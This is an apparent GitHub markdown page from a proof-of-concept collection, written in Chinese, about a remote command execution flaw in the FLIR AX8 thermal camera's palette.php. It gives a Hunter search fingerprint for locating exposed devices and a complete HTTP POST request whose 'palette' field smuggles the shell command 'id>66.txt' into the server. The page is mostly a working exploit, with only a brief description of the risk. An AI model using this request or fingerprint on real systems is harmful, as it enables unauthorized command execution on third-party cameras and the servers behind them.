Skip to content

Latest commit

 

History

History
30 lines (23 loc) · 992 Bytes

FLIR-AX8热成像仪palette.php存在远程命令执行漏洞.md

File metadata and controls

30 lines (23 loc) · 992 Bytes

FLIR-AX8热成像仪palette.php存在远程命令执行漏洞

FLIR-AX8热成像仪palette.php存在远程命令执行漏洞,允许攻击者在目标服务器上执行任意系统命令,可能导致服务器被完全控制、数据泄露或破坏,严重威胁系统安全。

hunter

web.icon=="f4370ff0b4763e18159cd7cdf36a4542"

poc

POST /palette.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ****
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 19

palette=;id>66.txt;

image-20240927202542338